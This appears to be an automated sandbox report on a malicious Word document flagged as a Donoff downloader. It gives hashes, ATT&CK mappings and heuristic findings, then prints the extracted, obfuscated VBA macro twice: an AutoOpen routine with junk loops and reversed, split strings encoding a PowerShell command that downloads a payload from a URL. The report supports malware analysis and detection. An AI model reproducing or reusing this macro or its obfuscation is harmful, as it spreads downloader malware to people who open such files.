Office (OLE) malware analysis — malicious · 07dac7b298c9f5c3

MALICIOUS

Office (OLE)

173.5 KB Created: 2018-05-18 13:24:00 Authoring application: Microsoft Office Word First seen: 2018-06-30

MD5: 11d40a9f93fc117c73fb67998e0cd318 SHA-1: ebdcea77860fbe86775cb6ecbdf9079ce7e0a937 SHA-256: 07dac7b298c9f5c30603d2bd80fbd8b6e68b591d678cfbe67a54f5f17c5e7784

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro utilizes a Shell() call, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Downloader.Donoff-7143240-0' strongly suggests the macro's purpose is to download and execute a secondary payload, characteristic of a downloader malware. The presence of legacy WordBasic auto-exec markers further supports the malicious nature of the document.

Heuristics 6

ClamAV: Doc.Downloader.Donoff-7143240-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Donoff-7143240-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 173868 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	173868 bytes
SHA-256: `8584ffc665fd691b689c78eadbd51b63b7c44fd860839af5ac740db733309291`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HNaSpWfX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub ATTOiw(wzzFc) For ShuFY = 86172 To 70923 For ruIzza = 52727 To LlWZF AVkCR = ChrB(pbzJD) Next OTVpR = 32325 * 65647 JYKOi = fZoMi + COjYV Next End Sub Sub aPwQz(vjLHDV) For FrCvc = 20749 To 41221 For vqPnk = 50614 To NAnwU pTFsbK = ChrB(wKXWS) Next dMzTEO = 99713 * 5056 YjdMZv = KUGBX + XwCAz Next For VlSsV = 84020 To 94394 For NhjiUs = 20672 To ZOPlXc DQQVNo = ChrB(QDOzh) Next GnIUcG = 16996 * 56059 YjiEdX = lOislP + EWjAKR Next For UXLQol = 12342 To 88933 For RTWRr = 69285 To IKicSz oIqLE = ChrB(sGzLFE) Next Topmh = 83087 * 9699 ZPzkU = aqjoNU + WIzaC Next End Sub Sub QKVKMn(XUUrva) For EPttaj = 36883 To 34643 For RWrjE = 94956 To sMfvoC ElztI = ChrB(VotmZ) Next GPEzS = 54664 * 97396 DnUDWZ = cfPfGB + oHcqK Next For uddFJ = 7294 To 82383 For nMMTp = 14831 To QQtXiR IdHTwu = ChrB(wXbRmA) Next KPuSiY = 78505 * 35672 MQtMY = jTbuBU + zqEwqr Next End Sub Sub Autoopen() On Error Resume Next For lBDGZF = 1363 To 98546 For zsEqa = 90690 To EhBEn przGL = ChrB(DNmiz) Next RKNnnS = 82677 * 70048 bCwiY = nAOom + cLLGT Next jcDlfBfBDQr (ivqNKG + GfzhaTPdZuDtB + IkpRu) For NCtNpC = 53705 To 75273 For QNXtL = 50859 To wCjUYI YOrqQP = ChrB(wiTFY) Next izVErH = 38336 * 60806 pRvnTl = laKFOV + zMLXwR Next End Sub Sub EomaGA(ccRoJu) For audwj = 20680 To 93580 For uSlMwY = 83307 To jXNzld MMkHJ = ChrB(tRFaaX) Next ibQHi = 20593 * 87089 ptCIk = iRvzmz + RjvDnv Next For AjmXA = 49185 To 95683 For GGOaj = 77460 To SizYA AJdnZ = ChrB(QsUDvP) Next TJHiHL = 98631 * 50279 piLNw = QNEOvq + WIkbu Next For PmCTLs = 40589 To 25024 For DrNBl = 81854 To vbMjW GwhUBS = ChrB(zufQSK) Next mPAVd = 64901 * 11028 MBtFJ = NIPNK + fDmrqC Next End Sub Sub LJMwia(ijbqD) For Vwmfav = 17778 To 70020 For mQDHVr = 66323 To IiaHtA EKiqU = ChrB(jYJWTi) Next GRusp = 50303 * 44268 tbFbzD = Lcjbw + bPRSQE Next End Sub Attribute VB_Name = "rtlCIRW" Sub jiRTdE(jZPUd) For Njprm = 60668 To 59994 For daZVQ = 6981 To qCSihd uPHTjP = ChrB(rCvati) Next vLWlr = 78010 * 12330 rwMBM = Wzlwjl + ajTwPV Next End Sub Function GfzhaTPdZuDtB() On Error Resume Next For XiuXYm = 89709 To 83679 For zqoVnX = 19189 To fDnUF iKtaV = ChrB(DmbSUk) Next DpcZw = 60358 * 3571 GuQzCZ = SLiQS + QNfLZ Next For RwWcpN = 30118 To 53352 For BHrPCI = 6199 To bNmpzz RfVSw = ChrB(JLzob) Next SccCK = 2989 * 88077 TpJUsl = RwCHT + VKJsz Next GrrmNaPjmWl = QKKjPq("9Y6r+ydr'+'/ydr+ydr:pttydr+ydrh@ydr+ydr/x9FuQydr+ydrmg/ydr+ydruh.ydr+ydrrihydr'+'+ydrferynydr+ydrodrag/ydr+ydr/:ptth'+' uaO ydr+ydr= Xydr+ydrCDARuU;)331ydr+ydr2ydr+ydr8ydr'+'+ydr2ydr+ydr ,0ydr+ydr00ybQB", 77961 + 4 - 77961, 77961 + 196 - 77961) For nrwsaa = 89239 To 69713 For zKcoD = 5517 To bWAZKH MzhINz = ChrB(SKMVF) Next Xzjuw = 2316 * 67271 nZSPw = inrYVj + jvsShn Next For OOaPdi = 56795 To 64804 For pRjiiM = 2334 To jQhFhi DKbEGo = ChrB(SiXJQ) Next CBnZzm = 54500 * 14510 qwjdK = ZHjhf + MSCZbB Next ADXBb = QKKjPq("SQNBiydr+ydruydr+ydraO( + BSNRydr+ydru'+'ydr+ydrU + '+'uydr+ydraOlydr+ydreoydr+ydruaydr+yd'+'rO +ydr+ydr cilbydr+ydrup:vneydr+ydrR'+'ydr+ydru'+'U =ydr+ydr ydr+ydrCydr+ydrDydr+ydrSRuU;)ydr+ydruaydr+707", 871 + 4 - 871, 871 + 192 - 871) For wwHVw = 2503 To 92203 ... (truncated)

SHA-256: 8584ffc665fd691b689c78eadbd51b63b7c44fd860839af5ac740db733309291

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HNaSpWfX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ATTOiw(wzzFc)
For ShuFY = 86172 To 70923
      For ruIzza = 52727 To LlWZF
         AVkCR = ChrB(pbzJD)
      Next
      OTVpR = 32325 * 65647
      JYKOi = fZoMi + COjYV
Next
End Sub
Sub aPwQz(vjLHDV)
For FrCvc = 20749 To 41221
      For vqPnk = 50614 To NAnwU
         pTFsbK = ChrB(wKXWS)
      Next
      dMzTEO = 99713 * 5056
      YjdMZv = KUGBX + XwCAz
Next
For VlSsV = 84020 To 94394
      For NhjiUs = 20672 To ZOPlXc
         DQQVNo = ChrB(QDOzh)
      Next
      GnIUcG = 16996 * 56059
      YjiEdX = lOislP + EWjAKR
Next
For UXLQol = 12342 To 88933
      For RTWRr = 69285 To IKicSz
         oIqLE = ChrB(sGzLFE)
      Next
      Topmh = 83087 * 9699
      ZPzkU = aqjoNU + WIzaC
Next
End Sub
Sub QKVKMn(XUUrva)
For EPttaj = 36883 To 34643
      For RWrjE = 94956 To sMfvoC
         ElztI = ChrB(VotmZ)
      Next
      GPEzS = 54664 * 97396
      DnUDWZ = cfPfGB + oHcqK
Next
For uddFJ = 7294 To 82383
      For nMMTp = 14831 To QQtXiR
         IdHTwu = ChrB(wXbRmA)
      Next
      KPuSiY = 78505 * 35672
      MQtMY = jTbuBU + zqEwqr
Next
End Sub
Sub Autoopen()
On Error Resume Next
For lBDGZF = 1363 To 98546
      For zsEqa = 90690 To EhBEn
         przGL = ChrB(DNmiz)
      Next
      RKNnnS = 82677 * 70048
      bCwiY = nAOom + cLLGT
Next
jcDlfBfBDQr (ivqNKG + GfzhaTPdZuDtB + IkpRu)
For NCtNpC = 53705 To 75273
      For QNXtL = 50859 To wCjUYI
         YOrqQP = ChrB(wiTFY)
      Next
      izVErH = 38336 * 60806
      pRvnTl = laKFOV + zMLXwR
Next
End Sub
Sub EomaGA(ccRoJu)
For audwj = 20680 To 93580
      For uSlMwY = 83307 To jXNzld
         MMkHJ = ChrB(tRFaaX)
      Next
      ibQHi = 20593 * 87089
      ptCIk = iRvzmz + RjvDnv
Next
For AjmXA = 49185 To 95683
      For GGOaj = 77460 To SizYA
         AJdnZ = ChrB(QsUDvP)
      Next
      TJHiHL = 98631 * 50279
      piLNw = QNEOvq + WIkbu
Next
For PmCTLs = 40589 To 25024
      For DrNBl = 81854 To vbMjW
         GwhUBS = ChrB(zufQSK)
      Next
      mPAVd = 64901 * 11028
      MBtFJ = NIPNK + fDmrqC
Next
End Sub
Sub LJMwia(ijbqD)
For Vwmfav = 17778 To 70020
      For mQDHVr = 66323 To IiaHtA
         EKiqU = ChrB(jYJWTi)
      Next
      GRusp = 50303 * 44268
      tbFbzD = Lcjbw + bPRSQE
Next
End Sub

Attribute VB_Name = "rtlCIRW"
Sub jiRTdE(jZPUd)
For Njprm = 60668 To 59994
      For daZVQ = 6981 To qCSihd
         uPHTjP = ChrB(rCvati)
      Next
      vLWlr = 78010 * 12330
      rwMBM = Wzlwjl + ajTwPV
Next
End Sub
Function GfzhaTPdZuDtB()
On Error Resume Next
For XiuXYm = 89709 To 83679
      For zqoVnX = 19189 To fDnUF
         iKtaV = ChrB(DmbSUk)
      Next
      DpcZw = 60358 * 3571
      GuQzCZ = SLiQS + QNfLZ
Next
For RwWcpN = 30118 To 53352
      For BHrPCI = 6199 To bNmpzz
         RfVSw = ChrB(JLzob)
      Next
      SccCK = 2989 * 88077
      TpJUsl = RwCHT + VKJsz
Next
GrrmNaPjmWl = QKKjPq("9Y6r+ydr'+'/ydr+ydr:pttydr+ydrh@ydr+ydr/x9FuQydr+ydrmg/ydr+ydruh.ydr+ydrrihydr'+'+ydrferynydr+ydrodrag/ydr+ydr/:ptth'+' uaO ydr+ydr= Xydr+ydrCDARuU;)331ydr+ydr2ydr+ydr8ydr'+'+ydr2ydr+ydr ,0ydr+ydr00ybQB", 77961 + 4 - 77961, 77961 + 196 - 77961)
For nrwsaa = 89239 To 69713
      For zKcoD = 5517 To bWAZKH
         MzhINz = ChrB(SKMVF)
      Next
      Xzjuw = 2316 * 67271
      nZSPw = inrYVj + jvsShn
Next
For OOaPdi = 56795 To 64804
      For pRjiiM = 2334 To jQhFhi
         DKbEGo = ChrB(SiXJQ)
      Next
      CBnZzm = 54500 * 14510
      qwjdK = ZHjhf + MSCZbB
Next
ADXBb = QKKjPq("SQNBiydr+ydruydr+ydraO( + BSNRydr+ydru'+'ydr+ydrU + '+'uydr+ydraOlydr+ydreoydr+ydruaydr+yd'+'rO +ydr+ydr cilbydr+ydrup:vneydr+ydrR'+'ydr+ydru'+'U =ydr+ydr ydr+ydrCydr+ydrDydr+ydrSRuU;)ydr+ydruaydr+707", 871 + 4 - 871, 871 + 192 - 871)
For wwHVw = 2503 To 92203
    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.